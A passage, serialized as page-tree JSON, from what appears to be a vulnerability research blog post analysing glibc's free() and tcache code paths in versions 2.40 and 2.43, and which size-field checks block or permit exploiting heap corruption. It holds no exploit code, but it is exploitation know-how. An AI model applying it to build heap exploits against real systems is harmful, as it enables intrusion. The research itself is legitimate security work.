",{"type":27,"tag":84,"props":133583,"children":133585},{"className":133584},[],[133586],{"type":33,"value":133587},"0x0",{"type":33,"value":44798},{"type":27,"tag":84,"props":133590,"children":133592},{"className":133591},[],[133593],{"type":33,"value":131462},{"type":33,"value":133581},{"type":27,"tag":84,"props":133596,"children":133598},{"className":133597},[],[133599],{"type":33,"value":133600},"0x8",{"type":33,"value":133602},". As the name suggests, ",{"type":27,"tag":84,"props":133604,"children":133606},{"className":133605},[],[133607],{"type":33,"value":133579},{"type":33,"value":133609}," stores the size of the previous chunk and is only used when that chunk is free, while ",{"type":27,"tag":84,"props":133611,"children":133613},{"className":133612},[],[133614],{"type":33,"value":131462},{"type":33,"value":133616}," stores the size of the current chunk and three special bits of which ",{"type":27,"tag":84,"props":133618,"children":133620},{"className":133619},[],[133621],{"type":33,"value":133622},"PREV_INUSE",{"type":33,"value":1131},{"type":27,"tag":84,"props":133625,"children":133627},{"className":133626},[],[133628],{"type":33,"value":133629},"IS_MMAPPED",{"type":33,"value":133631}," are relevant for this blog post. The actual chunk data begins at offset ",{"type":27,"tag":84,"props":133633,"children":133635},{"className":133634},[],[133636],{"type":33,"value":133637},"0x10",{"type":33,"value":1041},{"type":27,"tag":36,"props":133640,"children":133641},{},[133642],{"type":33,"value":133643},"Freed chunks are organized into different bins depending on their size and state. For this writeup, the important one is the per-thread cache, or tcache. Tcache stores recently freed chunks in size-segregated singly linked lists and is generally the first place glibc looks when servicing small allocations.",{"type":27,"tag":44596,"props":133645,"children":133647},{"id":133646},"free-path",[133648],{"type":33,"value":133649},"free() path",{"type":27,"tag":36,"props":133651,"children":133652},{},[133653,133655,133661],{"type":33,"value":133654},"Let’s first look at the ",{"type":27,"tag":84,"props":133656,"children":133658},{"className":133657},[],[133659],{"type":33,"value":133660},"free()",{"type":33,"value":133662}," path in glibc 2.40:",{"type":27,"tag":101,"props":133664,"children":133666},{"code":133665,"language":10435,"meta":7,"className":23789,"style":7},"__libc_free (void *mem)\n{\n mstate ar_ptr;\n mchunkptr p;\n\n p = mem2chunk (mem);\n if (chunk_is_mmapped (p))\n {\n munmap_chunk (p);\n }\n else\n {\n MAYBE_INIT_TCACHE ();\n\n ar_ptr = arena_for_chunk (p);\n _int_free (ar_ptr, p, 0);\n }\n}\n",[133667],{"type":27,"tag":84,"props":133668,"children":133669},{"__ignoreMap":7},[133670,133698,133705,133713,133721,133728,133750,133771,133778,133791,133798,133806,133813,133826,133833,133854,133875,133882],{"type":27,"tag":207,"props":133671,"children":133672},{"class":209,"line":210},[133673,133678,133682,133686,133690,133694],{"type":27,"tag":207,"props":133674,"children":133675},{"style":1335},[133676],{"type":33,"value":133677},"__libc_free",{"type":27,"tag":207,"props":133679,"children":133680},{"style":238},[133681],{"type":33,"value":686},{"type":27,"tag":207,"props":133683,"children":133684},{"style":214},[133685],{"type":33,"value":58863},{"type":27,"tag":207,"props":133687,"children":133688},{"style":226},[133689],{"type":33,"value":17093},{"type":27,"tag":207,"props":133691,"children":133692},{"style":220},[133693],{"type":33,"value":47909},{"type":27,"tag":207,"props":133695,"children":133696},{"style":238},[133697],{"type":33,"value":10449},{"type":27,"tag":207,"props":133699,"children":133700},{"class":209,"line":244},[133701],{"type":27,"tag":207,"props":133702,"children":133703},{"style":238},[133704],{"type":33,"value":18158},{"type":27,"tag":207,"props":133706,"children":133707},{"class":209,"line":270},[133708],{"type":27,"tag":207,"props":133709,"children":133710},{"style":238},[133711],{"type":33,"value":133712}," mstate ar_ptr;\n",{"type":27,"tag":207,"props":133714,"children":133715},{"class":209,"line":296},[133716],{"type":27,"tag":207,"props":133717,"children":133718},{"style":238},[133719],{"type":33,"value":133720}," mchunkptr p;\n",{"type":27,"tag":207,"props":133722,"children":133723},{"class":209,"line":445},[133724],{"type":27,"tag":207,"props":133725,"children":133726},{"emptyLinePlaceholder":19},[133727],{"type":33,"value":2062},{"type":27,"tag":207,"props":133729,"children":133730},{"class":209,"line":867},[133731,133736,133740,133745],{"type":27,"tag":207,"props":133732,"children":133733},{"style":238},[133734],{"type":33,"value":133735}," p ",{"type":27,"tag":207,"props":133737,"children":133738},{"style":226},[133739],{"type":33,"value":10380},{"type":27,"tag":207,"props":133741,"children":133742},{"style":1335},[133743],{"type":33,"value":133744}," mem2chunk",{"type":27,"tag":207,"props":133746,"children":133747},{"style":238},[133748],{"type":33,"value":133749}," (mem);\n",{"type":27,"tag":207,"props":133751,"children":133752},{"class":209,"line":892},[133753,133757,133761,133766],{"type":27,"tag":207,"props":133754,"children":133755},{"style":376},[133756],{"type":33,"value":38654},{"type":27,"tag":207,"props":133758,"children":133759},{"style":238},[133760],{"type":33,"value":686},{"type":27,"tag":207,"props":133762,"children":133763},{"style":1335},[133764],{"type":33,"value":133765},"chunk_is_mmapped",{"type":27,"tag":207,"props":133767,"children":133768},{"style":238},[133769],{"type":33,"value":133770}," (p))\n",{"type":27,"tag":207,"props":133772,"children":133773},{"class":209,"line":1475},[133774],{"type":27,"tag":207,"props":133775,"children":133776},{"style":238},[133777],{"type":33,"value":36449},{"type":27,"tag":207,"props":133779,"children":133780},{"class":209,"line":2065},[133781,133786],{"type":27,"tag":207,"props":133782,"children":133783},{"style":1335},[133784],{"type":33,"value":133785}," munmap_chunk",{"type":27,"tag":207,"props":133787,"children":133788},{"style":238},[133789],{"type":33,"value":133790}," (p);\n",{"type":27,"tag":207,"props":133792,"children":133793},{"class":209,"line":2092},[133794],{"type":27,"tag":207,"props":133795,"children":133796},{"style":238},[133797],{"type":33,"value":10645},{"type":27,"tag":207,"props":133799,"children":133800},{"class":209,"line":2130},[133801],{"type":27,"tag":207,"props":133802,"children":133803},{"style":376},[133804],{"type":33,"value":133805}," else\n",{"type":27,"tag":207,"props":133807,"children":133808},{"class":209,"line":2168},[133809],{"type":27,"tag":207,"props":133810,"children":133811},{"style":238},[133812],{"type":33,"value":36449},{"type":27,"tag":207,"props":133814,"children":133815},{"class":209,"line":4095},[133816,133821],{"type":27,"tag":207,"props":133817,"children":133818},{"style":1335},[133819],{"type":33,"value":133820}," MAYBE_INIT_TCACHE",{"type":27,"tag":207,"props":133822,"children":133823},{"style":238},[133824],{"type":33,"value":133825}," ();\n",{"type":27,"tag":207,"props":133827,"children":133828},{"class":209,"line":4103},[133829],{"type":27,"tag":207,"props":133830,"children":133831},{"emptyLinePlaceholder":19},[133832],{"type":33,"value":2062},{"type":27,"tag":207,"props":133834,"children":133835},{"class":209,"line":4154},[133836,133841,133845,133850],{"type":27,"tag":207,"props":133837,"children":133838},{"style":238},[133839],{"type":33,"value":133840}," ar_ptr ",{"type":27,"tag":207,"props":133842,"children":133843},{"style":226},[133844],{"type":33,"value":10380},{"type":27,"tag":207,"props":133846,"children":133847},{"style":1335},[133848],{"type":33,"value":133849}," arena_for_chunk",{"type":27,"tag":207,"props":133851,"children":133852},{"style":238},[133853],{"type":33,"value":133790},{"type":27,"tag":207,"props":133855,"children":133856},{"class":209,"line":4203},[133857,133862,133867,133871],{"type":27,"tag":207,"props":133858,"children":133859},{"style":1335},[133860],{"type":33,"value":133861}," _int_free",{"type":27,"tag":207,"props":133863,"children":133864},{"style":238},[133865],{"type":33,"value":133866}," (ar_ptr, p, ",{"type":27,"tag":207,"props":133868,"children":133869},{"style":232},[133870],{"type":33,"value":1660},{"type":27,"tag":207,"props":133872,"children":133873},{"style":238},[133874],{"type":33,"value":1455},{"type":27,"tag":207,"props":133876,"children":133877},{"class":209,"line":4249},[133878],{"type":27,"tag":207,"props":133879,"children":133880},{"style":238},[133881],{"type":33,"value":10645},{"type":27,"tag":207,"props":133883,"children":133884},{"class":209,"line":4290},[133885],{"type":27,"tag":207,"props":133886,"children":133887},{"style":238},[133888],{"type":33,"value":451},{"type":27,"tag":36,"props":133890,"children":133891},{},[133892,133894,133899,133901,133906,133908,133914,133916,133922,133924,133929,133931,133936,133938,133943,133945,133950],{"type":33,"value":133893},"We can see that if the ",{"type":27,"tag":84,"props":133895,"children":133897},{"className":133896},[],[133898],{"type":33,"value":133629},{"type":33,"value":133900}," bit is set in the corrupted ",{"type":27,"tag":84,"props":133902,"children":133904},{"className":133903},[],[133905],{"type":33,"value":131462},{"type":33,"value":133907}," field, glibc will call ",{"type":27,"tag":84,"props":133909,"children":133911},{"className":133910},[],[133912],{"type":33,"value":133913},"munmap_chunk",{"type":33,"value":133915},", which internally checks that ",{"type":27,"tag":84,"props":133917,"children":133919},{"className":133918},[],[133920],{"type":33,"value":133921},"prev_size + size",{"type":33,"value":133923}," is page-aligned. To reach the ",{"type":27,"tag":84,"props":133925,"children":133927},{"className":133926},[],[133928],{"type":33,"value":131462},{"type":33,"value":133930}," field, we first have to overwrite the entire 8-byte ",{"type":27,"tag":84,"props":133932,"children":133934},{"className":133933},[],[133935],{"type":33,"value":133579},{"type":33,"value":133937}," field with uncontrolled data. The chance that a corrupted ",{"type":27,"tag":84,"props":133939,"children":133941},{"className":133940},[],[133942],{"type":33,"value":133921},{"type":33,"value":133944}," value still ends up page-aligned is extremely small. In practice, if ",{"type":27,"tag":84,"props":133946,"children":133948},{"className":133947},[],[133949],{"type":33,"value":133629},{"type":33,"value":133951}," is set, the process will almost certainly abort before we can make use of the corruption.",{"type":27,"tag":36,"props":133953,"children":133954},{},[133955,133957,133962,133964,133970],{"type":33,"value":133956},"Assuming ",{"type":27,"tag":84,"props":133958,"children":133960},{"className":133959},[],[133961],{"type":33,"value":133629},{"type":33,"value":133963}," is not set, execution continues into ",{"type":27,"tag":84,"props":133965,"children":133967},{"className":133966},[],[133968],{"type":33,"value":133969},"_int_free",{"type":33,"value":736},{"type":27,"tag":101,"props":133972,"children":133974},{"code":133973,"language":10435,"meta":7,"className":23789,"style":7},"static void\n_int_free (mstate av, mchunkptr p, int have_lock)\n{\n INTERNAL_SIZE_T size;\n\n size = chunksize (p);\n\n /* Little security check which won't hurt performance: the\n allocator never wraps around at the end of the address space.\n Therefore we can exclude some size values which might appear\n here by accident or by \"design\" from some intruder. */\n if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)\n || __builtin_expect (misaligned_chunk (p), 0))\n malloc_printerr (\"free(): invalid pointer\");\n /* We know that each chunk is at least MINSIZE bytes in size or a\n multiple of MALLOC_ALIGNMENT. */\n if (__glibc_unlikely (size \u003C MINSIZE || !aligned_OK (size)))\n malloc_printerr (\"free(): invalid size\");\n\n check_inuse_chunk(av, p);\n\n [...]\n",[133975],{"type":27,"tag":84,"props":133976,"children":133977},{"__ignoreMap":7},[133978,133990,134033,134040,134048,134055,134076,134083,134091,134099,134107,134115,134179,134214,134235,134243,134251,134299,134319,134326,134339,134346],{"type":27,"tag":207,"props":133979,"children":133980},{"class":209,"line":210},[133981,133985],{"type":27,"tag":207,"props":133982,"children":133983},{"style":214},[133984],{"type":33,"value":58283},{"type":27,"tag":207,"props":133986,"children":133987},{"style":214},[133988],{"type":33,"value":133989}," void\n",{"type":27,"tag":207,"props":133991,"children":133992},{"class":209,"line":244},[133993,133997,134002,134007,134012,134016,134020,134024,134029],{"type":27,"tag":207,"props":133994,"children":133995},{"style":1335},[133996],{"type":33,"value":133969},{"type":27,"tag":207,"props":133998,"children":133999},{"style":238},[134000],{"type":33,"value":134001}," (mstate ",{"type":27,"tag":207,"props":134003,"children":134004},{"style":220},[134005],{"type":33,"value":134006},"av",{"type":27,"tag":207,"props":134008,"children":134009},{"style":238},[134010],{"type":33,"value":134011},", mchunkptr ",{"type":27,"tag":207,"props":134013,"children":134014},{"style":220},[134015],{"type":33,"value":36},{"type":27,"tag":207,"props":134017,"children":134018},{"style":238},[134019],{"type":33,"value":1123},{"type":27,"tag":207,"props":134021,"children":134022},{"style":214},[134023],{"type":33,"value":26317},{"type":27,"tag":207,"props":134025,"children":134026},{"style":220},[134027],{"type":33,"value":134028}," have_lock",{"type":27,"tag":207,"props":134030,"children":134031},{"style":238},[134032],{"type":33,"value":10449},{"type":27,"tag":207,"props":134034,"children":134035},{"class":209,"line":270},[134036],{"type":27,"tag":207,"props":134037,"children":134038},{"style":238},[134039],{"type":33,"value":18158},{"type":27,"tag":207,"props":134041,"children":134042},{"class":209,"line":296},[134043],{"type":27,"tag":207,"props":134044,"children":134045},{"style":238},[134046],{"type":33,"value":134047}," INTERNAL_SIZE_T size;\n",{"type":27,"tag":207,"props":134049,"children":134050},{"class":209,"line":445},[134051],{"type":27,"tag":207,"props":134052,"children":134053},{"emptyLinePlaceholder":19},[134054],{"type":33,"value":2062},{"type":27,"tag":207,"props":134056,"children":134057},{"class":209,"line":867},[134058,134063,134067,134072],{"type":27,"tag":207,"props":134059,"children":134060},{"style":238},[134061],{"type":33,"value":134062}," size ",{"type":27,"tag":207,"props":134064,"children":134065},{"style":226},[134066],{"type":33,"value":10380},{"type":27,"tag":207,"props":134068,"children":134069},{"style":1335},[134070],{"type":33,"value":134071}," chunksize",{"type":27,"tag":207,"props":134073,"children":134074},{"style":238},[134075],{"type":33,"value":133790},{"type":27,"tag":207,"props":134077,"children":134078},{"class":209,"line":892},[134079],{"type":27,"tag":207,"props":134080,"children":134081},{"emptyLinePlaceholder":19},[134082],{"type":33,"value":2062},{"type":27,"tag":207,"props":134084,"children":134085},{"class":209,"line":1475},[134086],{"type":27,"tag":207,"props":134087,"children":134088},{"style":4647},[134089],{"type":33,"value":134090}," /* Little security check which won't hurt performance: the\n",{"type":27,"tag":207,"props":134092,"children":134093},{"class":209,"line":2065},[134094],{"type":27,"tag":207,"props":134095,"children":134096},{"style":4647},[134097],{"type":33,"value":134098}," allocator never wraps around at the end of the address space.\n",{"type":27,"tag":207,"props":134100,"children":134101},{"class":209,"line":2092},[134102],{"type":27,"tag":207,"props":134103,"children":134104},{"style":4647},[134105],{"type":33,"value":134106}," Therefore we can exclude some size values which might appear\n",{"type":27,"tag":207,"props":134108,"children":134109},{"class":209,"line":2130},[134110],{"type":27,"tag":207,"props":134111,"children":134112},{"style":4647},[134113],{"type":33,"value":134114}," here by accident or by \"design\" from some intruder. */\n",{"type":27,"tag":207,"props":134116,"children":134117},{"class":209,"line":2168},[134118,134122,134126,134131,134136,134141,134146,134150,134154,134158,134162,134166,134171,134175],{"type":27,"tag":207,"props":134119,"children":134120},{"style":376},[134121],{"type":33,"value":38654},{"type":27,"tag":207,"props":134123,"children":134124},{"style":238},[134125],{"type":33,"value":686},{"type":27,"tag":207,"props":134127,"children":134128},{"style":1335},[134129],{"type":33,"value":134130},"__builtin_expect",{"type":27,"tag":207,"props":134132,"children":134133},{"style":238},[134134],{"type":33,"value":134135}," ((",{"type":27,"tag":207,"props":134137,"children":134138},{"style":214},[134139],{"type":33,"value":134140},"uintptr_t",{"type":27,"tag":207,"props":134142,"children":134143},{"style":238},[134144],{"type":33,"value":134145},") p ",{"type":27,"tag":207,"props":134147,"children":134148},{"style":226},[134149],{"type":33,"value":17739},{"type":27,"tag":207,"props":134151,"children":134152},{"style":238},[134153],{"type":33,"value":686},{"type":27,"tag":207,"props":134155,"children":134156},{"style":214},[134157],{"type":33,"value":134140},{"type":27,"tag":207,"props":134159,"children":134160},{"style":238},[134161],{"type":33,"value":2222},{"type":27,"tag":207,"props":134163,"children":134164},{"style":226},[134165],{"type":33,"value":11611},{"type":27,"tag":207,"props":134167,"children":134168},{"style":238},[134169],{"type":33,"value":134170},"size, ",{"type":27,"tag":207,"props":134172,"children":134173},{"style":232},[134174],{"type":33,"value":1660},{"type":27,"tag":207,"props":134176,"children":134177},{"style":238},[134178],{"type":33,"value":10449},{"type":27,"tag":207,"props":134180,"children":134181},{"class":209,"line":4095},[134182,134187,134192,134196,134201,134206,134210],{"type":27,"tag":207,"props":134183,"children":134184},{"style":226},[134185],{"type":33,"value":134186}," ||",{"type":27,"tag":207,"props":134188,"children":134189},{"style":1335},[134190],{"type":33,"value":134191}," __builtin_expect",{"type":27,"tag":207,"props":134193,"children":134194},{"style":238},[134195],{"type":33,"value":686},{"type":27,"tag":207,"props":134197,"children":134198},{"style":1335},[134199],{"type":33,"value":134200},"misaligned_chunk",{"type":27,"tag":207,"props":134202,"children":134203},{"style":238},[134204],{"type":33,"value":134205}," (p), ",{"type":27,"tag":207,"props":134207,"children":134208},{"style":232},[134209],{"type":33,"value":1660},{"type":27,"tag":207,"props":134211,"children":134212},{"style":238},[134213],{"type":33,"value":26983},{"type":27,"tag":207,"props":134215,"children":134216},{"class":209,"line":4103},[134217,134222,134226,134231],{"type":27,"tag":207,"props":134218,"children":134219},{"style":1335},[134220],{"type":33,"value":134221}," malloc_printerr",{"type":27,"tag":207,"props":134223,"children":134224},{"style":238},[134225],{"type":33,"value":686},{"type":27,"tag":207,"props":134227,"children":134228},{"style":1325},[134229],{"type":33,"value":134230},"\"free(): invalid pointer\"",{"type":27,"tag":207,"props":134232,"children":134233},{"style":238},[134234],{"type":33,"value":1455},{"type":27,"tag":207,"props":134236,"children":134237},{"class":209,"line":4154},[134238],{"type":27,"tag":207,"props":134239,"children":134240},{"style":4647},[134241],{"type":33,"value":134242}," /* We know that each chunk is at least MINSIZE bytes in size or a\n",{"type":27,"tag":207,"props":134244,"children":134245},{"class":209,"line":4203},[134246],{"type":27,"tag":207,"props":134247,"children":134248},{"style":4647},[134249],{"type":33,"value":134250}," multiple of MALLOC_ALIGNMENT. */\n",{"type":27,"tag":207,"props":134252,"children":134253},{"class":209,"line":4249},[134254,134258,134262,134267,134272,134276,134281,134285,134289,134294],{"type":27,"tag":207,"props":134255,"children":134256},{"style":376},[134257],{"type":33,"value":38654},{"type":27,"tag":207,"props":134259,"children":134260},{"style":238},[134261],{"type":33,"value":686},{"type":27,"tag":207,"props":134263,"children":134264},{"style":1335},[134265],{"type":33,"value":134266},"__glibc_unlikely",{"type":27,"tag":207,"props":134268,"children":134269},{"style":238},[134270],{"type":33,"value":134271}," (size ",{"type":27,"tag":207,"props":134273,"children":134274},{"style":226},[134275],{"type":33,"value":9257},{"type":27,"tag":207,"props":134277,"children":134278},{"style":238},[134279],{"type":33,"value":134280}," MINSIZE ",{"type":27,"tag":207,"props":134282,"children":134283},{"style":226},[134284],{"type":33,"value":29691},{"type":27,"tag":207,"props":134286,"children":134287},{"style":226},[134288],{"type":33,"value":20141},{"type":27,"tag":207,"props":134290,"children":134291},{"style":1335},[134292],{"type":33,"value":134293},"aligned_OK",{"type":27,"tag":207,"props":134295,"children":134296},{"style":238},[134297],{"type":33,"value":134298}," (size)))\n",{"type":27,"tag":207,"props":134300,"children":134301},{"class":209,"line":4290},[134302,134306,134310,134315],{"type":27,"tag":207,"props":134303,"children":134304},{"style":1335},[134305],{"type":33,"value":134221},{"type":27,"tag":207,"props":134307,"children":134308},{"style":238},[134309],{"type":33,"value":686},{"type":27,"tag":207,"props":134311,"children":134312},{"style":1325},[134313],{"type":33,"value":134314},"\"free(): invalid size\"",{"type":27,"tag":207,"props":134316,"children":134317},{"style":238},[134318],{"type":33,"value":1455},{"type":27,"tag":207,"props":134320,"children":134321},{"class":209,"line":4304},[134322],{"type":27,"tag":207,"props":134323,"children":134324},{"emptyLinePlaceholder":19},[134325],{"type":33,"value":2062},{"type":27,"tag":207,"props":134327,"children":134328},{"class":209,"line":5466},[134329,134334],{"type":27,"tag":207,"props":134330,"children":134331},{"style":1335},[134332],{"type":33,"value":134333}," check_inuse_chunk",{"type":27,"tag":207,"props":134335,"children":134336},{"style":238},[134337],{"type":33,"value":134338},"(av, p);\n",{"type":27,"tag":207,"props":134340,"children":134341},{"class":209,"line":5530},[134342],{"type":27,"tag":207,"props":134343,"children":134344},{"emptyLinePlaceholder":19},[134345],{"type":33,"value":2062},{"type":27,"tag":207,"props":134347,"children":134348},{"class":209,"line":7900},[134349],{"type":27,"tag":207,"props":134350,"children":134351},{"style":238},[134352],{"type":33,"value":8902},{"type":27,"tag":36,"props":134354,"children":134355},{},[134356],{"type":33,"value":134357},"The first check verifies that the chunk pointer itself is not misaligned. Since we do not control the pointer, this is not particularly relevant here.",{"type":27,"tag":36,"props":134359,"children":134360},{},[134361,134363,134368,134370,134375,134377,134382,134384,134389],{"type":33,"value":134362},"The next check, however, ensures that the ",{"type":27,"tag":84,"props":134364,"children":134366},{"className":134365},[],[134367],{"type":33,"value":131462},{"type":33,"value":134369}," field is 16-byte aligned. This means that the low byte we overwrite in ",{"type":27,"tag":84,"props":134371,"children":134373},{"className":134372},[],[134374],{"type":33,"value":131462},{"type":33,"value":134376}," must preserve alignment while also avoiding the ",{"type":27,"tag":84,"props":134378,"children":134380},{"className":134379},[],[134381],{"type":33,"value":133629},{"type":33,"value":134383}," bit. Under those constraints, exploiting the bug through ",{"type":27,"tag":84,"props":134385,"children":134387},{"className":134386},[],[134388],{"type":33,"value":131462},{"type":33,"value":134390}," corruption looked very unreliable at first.",{"type":27,"tag":36,"props":134392,"children":134393},{},[134394],{"type":33,"value":134395},"Still, we wanted to check how this behaved in the latest glibc 2.43:",{"type":27,"tag":101,"props":134397,"children":134399},{"code":134398,"language":10435,"meta":7,"className":23789,"style":7},"void\n__libc_free (void *mem)\n{\n mchunkptr p;\n\n p = mem2chunk (mem);\n\n INTERNAL_SIZE_T size = chunksize (p);\n\n if (__glibc_unlikely (misaligned_chunk (p)))\n return malloc_printerr_tail (\"free(): invalid pointer\");\n\n#if USE_TCACHE\n if (__glibc_likely (size \u003C mp_.tcache_max_bytes))\n {\n [...]\n\n return tcache_put (p, tc_idx);\n }\n",[134400],{"type":27,"tag":84,"props":134401,"children":134402},{"__ignoreMap":7},[134403,134411,134438,134445,134452,134459,134478,134485,134505,134512,134540,134564,134571,134584,134626,134633,134641,134648,134665],{"type":27,"tag":207,"props":134404,"children":134405},{"class":209,"line":210},[134406],{"type":27,"tag":207,"props":134407,"children":134408},{"style":214},[134409],{"type":33,"value":134410},"void\n",{"type":27,"tag":207,"props":134412,"children":134413},{"class":209,"line":244},[134414,134418,134422,134426,134430,134434],{"type":27,"tag":207,"props":134415,"children":134416},{"style":1335},[134417],{"type":33,"value":133677},{"type":27,"tag":207,"props":134419,"children":134420},{"style":238},[134421],{"type":33,"value":686},{"type":27,"tag":207,"props":134423,"children":134424},{"style":214},[134425],{"type":33,"value":58863},{"type":27,"tag":207,"props":134427,"children":134428},{"style":226},[134429],{"type":33,"value":17093},{"type":27,"tag":207,"props":134431,"children":134432},{"style":220},[134433],{"type":33,"value":47909},{"type":27,"tag":207,"props":134435,"children":134436},{"style":238},[134437],{"type":33,"value":10449},{"type":27,"tag":207,"props":134439,"children":134440},{"class":209,"line":270},[134441],{"type":27,"tag":207,"props":134442,"children":134443},{"style":238},[134444],{"type":33,"value":18158},{"type":27,"tag":207,"props":134446,"children":134447},{"class":209,"line":296},[134448],{"type":27,"tag":207,"props":134449,"children":134450},{"style":238},[134451],{"type":33,"value":133720},{"type":27,"tag":207,"props":134453,"children":134454},{"class":209,"line":445},[134455],{"type":27,"tag":207,"props":134456,"children":134457},{"emptyLinePlaceholder":19},[134458],{"type":33,"value":2062},{"type":27,"tag":207,"props":134460,"children":134461},{"class":209,"line":867},[134462,134466,134470,134474],{"type":27,"tag":207,"props":134463,"children":134464},{"style":238},[134465],{"type":33,"value":133735},{"type":27,"tag":207,"props":134467,"children":134468},{"style":226},[134469],{"type":33,"value":10380},{"type":27,"tag":207,"props":134471,"children":134472},{"style":1335},[134473],{"type":33,"value":133744},{"type":27,"tag":207,"props":134475,"children":134476},{"style":238},[134477],{"type":33,"value":133749},{"type":27,"tag":207,"props":134479,"children":134480},{"class":209,"line":892},[134481],{"type":27,"tag":207,"props":134482,"children":134483},{"emptyLinePlaceholder":19},[134484],{"type":33,"value":2062},{"type":27,"tag":207,"props":134486,"children":134487},{"class":209,"line":1475},[134488,134493,134497,134501],{"type":27,"tag":207,"props":134489,"children":134490},{"style":238},[134491],{"type":33,"value":134492}," INTERNAL_SIZE_T size ",{"type":27,"tag":207,"props":134494,"children":134495},{"style":226},[134496],{"type":33,"value":10380},{"type":27,"tag":207,"props":134498,"children":134499},{"style":1335},[134500],{"type":33,"value":134071},{"type":27,"tag":207,"props":134502,"children":134503},{"style":238},[134504],{"type":33,"value":133790},{"type":27,"tag":207,"props":134506,"children":134507},{"class":209,"line":2065},[134508],{"type":27,"tag":207,"props":134509,"children":134510},{"emptyLinePlaceholder":19},[134511],{"type":33,"value":2062},{"type":27,"tag":207,"props":134513,"children":134514},{"class":209,"line":2092},[134515,134519,134523,134527,134531,134535],{"type":27,"tag":207,"props":134516,"children":134517},{"style":376},[134518],{"type":33,"value":38654},{"type":27,"tag":207,"props":134520,"children":134521},{"style":238},[134522],{"type":33,"value":686},{"type":27,"tag":207,"props":134524,"children":134525},{"style":1335},[134526],{"type":33,"value":134266},{"type":27,"tag":207,"props":134528,"children":134529},{"style":238},[134530],{"type":33,"value":686},{"type":27,"tag":207,"props":134532,"children":134533},{"style":1335},[134534],{"type":33,"value":134200},{"type":27,"tag":207,"props":134536,"children":134537},{"style":238},[134538],{"type":33,"value":134539}," (p)))\n",{"type":27,"tag":207,"props":134541,"children":134542},{"class":209,"line":2130},[134543,134547,134552,134556,134560],{"type":27,"tag":207,"props":134544,"children":134545},{"style":376},[134546],{"type":33,"value":8986},{"type":27,"tag":207,"props":134548,"children":134549},{"style":1335},[134550],{"type":33,"value":134551}," malloc_printerr_tail",{"type":27,"tag":207,"props":134553,"children":134554},{"style":238},[134555],{"type":33,"value":686},{"type":27,"tag":207,"props":134557,"children":134558},{"style":1325},[134559],{"type":33,"value":134230},{"type":27,"tag":207,"props":134561,"children":134562},{"style":238},[134563],{"type":33,"value":1455},{"type":27,"tag":207,"props":134565,"children":134566},{"class":209,"line":2168},[134567],{"type":27,"tag":207,"props":134568,"children":134569},{"emptyLinePlaceholder":19},[134570],{"type":33,"value":2062},{"type":27,"tag":207,"props":134572,"children":134573},{"class":209,"line":4095},[134574,134579],{"type":27,"tag":207,"props":134575,"children":134576},{"style":376},[134577],{"type":33,"value":134578},"#if",{"type":27,"tag":207,"props":134580,"children":134581},{"style":1335},[134582],{"type":33,"value":134583}," USE_TCACHE\n",{"type":27,"tag":207,"props":134585,"children":134586},{"class":209,"line":4103},[134587,134591,134595,134600,134604,134608,134613,134617,134622],{"type":27,"tag":207,"props":134588,"children":134589},{"style":376},[134590],{"type":33,"value":38654},{"type":27,"tag":207,"props":134592,"children":134593},{"style":238},[134594],{"type":33,"value":686},{"type":27,"tag":207,"props":134596,"children":134597},{"style":1335},[134598],{"type":33,"value":134599},"__glibc_likely",{"type":27,"tag":207,"props":134601,"children":134602},{"style":238},[134603],{"type":33,"value":134271},{"type":27,"tag":207,"props":134605,"children":134606},{"style":226},[134607],{"type":33,"value":9257},{"type":27,"tag":207,"props":134609,"children":134610},{"style":220},[134611],{"type":33,"value":134612}," mp_",{"type":27,"tag":207,"props":134614,"children":134615},{"style":238},[134616],{"type":33,"value":1041},{"type":27,"tag":207,"props":134618,"children":134619},{"style":220},[134620],{"type":33,"value":134621},"tcache_max_bytes",{"type":27,"tag":207,"props":134623,"children":134624},{"style":238},[134625],{"type":33,"value":26983},{"type":27,"tag":207,"props":134627,"children":134628},{"class":209,"line":4154},[134629],{"type":27,"tag":207,"props":134630,"children":134631},{"style":238},[134632],{"type":33,"value":36449},{"type":27,"tag":207,"props":134634,"children":134635},{"class":209,"line":4203},[134636],{"type":27,"tag":207,"props":134637,"children":134638},{"style":238},[134639],{"type":33,"value":134640}," [...]\n",{"type":27,"tag":207,"props":134642,"children":134643},{"class":209,"line":4249},[134644],{"type":27,"tag":207,"props":134645,"children":134646},{"emptyLinePlaceholder":19},[134647],{"type":33,"value":2062},{"type":27,"tag":207,"props":134649,"children":134650},{"class":209,"line":4290},[134651,134655,134660],{"type":27,"tag":207,"props":134652,"children":134653},{"style":376},[134654],{"type":33,"value":46602},{"type":27,"tag":207,"props":134656,"children":134657},{"style":1335},[134658],{"type":33,"value":134659}," tcache_put",{"type":27,"tag":207,"props":134661,"children":134662},{"style":238},[134663],{"type":33,"value":134664}," (p, tc_idx);\n",{"type":27,"tag":207,"props":134666,"children":134667},{"class":209,"line":4304},[134668],{"type":27,"tag":207,"props":134669,"children":134670},{"style":238},[134671],{"type":33,"value":10645},{"type":27,"tag":36,"props":134673,"children":134674},{},[134675,134677,134682],{"type":33,"value":134676},"It is easy to notice that, when taking the tcache path, there are essentially no integrity checks on the ",{"type":27,"tag":84,"props":134678,"children":134680},{"className":134679},[],[134681],{"type":33,"value":131462},{"type":33,"value":134683}," field beyond the basic size-range decision needed to determine whether the chunk fits into tcache. The only explicit check here is that the pointer itself is aligned, which is not something we care about.",{"type":27,"tag":36,"props":134685,"children":134686},{},[134687,134689,134695,134696,134701],{"type":33,"value":134688},"In fact, even the version prior to 2.43 still performed more validation on the tcache path by calling ",{"type":27,"tag":84,"props":134690,"children":134692},{"className":134691},[],[134693],{"type":33,"value":134694},"check_inuse_chunk",{"type":33,"value":686},{"type":27,"tag":84,"props":134697,"children":134699},{"className":134698},[],[134700],{"type":33,"value":131590},{"type":33,"value":31210},{"type":27,"tag":101,"props":134703,"children":134705},{"code":134704,"language":10435,"meta":7,"className":23789,"style":7},"void\n__libc_free (void *mem)\n{\n mchunkptr p;\n\n p = mem2chunk (mem);\n\n INTERNAL_SIZE_T size = chunksize (p);\n\n if (__glibc_unlikely (misaligned_chunk (p)))\n return malloc_printerr_tail (\"free(): invalid pointer\");\n\n check_inuse_chunk (arena_for_chunk (p), p); // [1]\n\n#if USE_TCACHE\n if (__glibc_likely (size \u003C mp_.tcache_max_bytes && tcache != NULL))\n 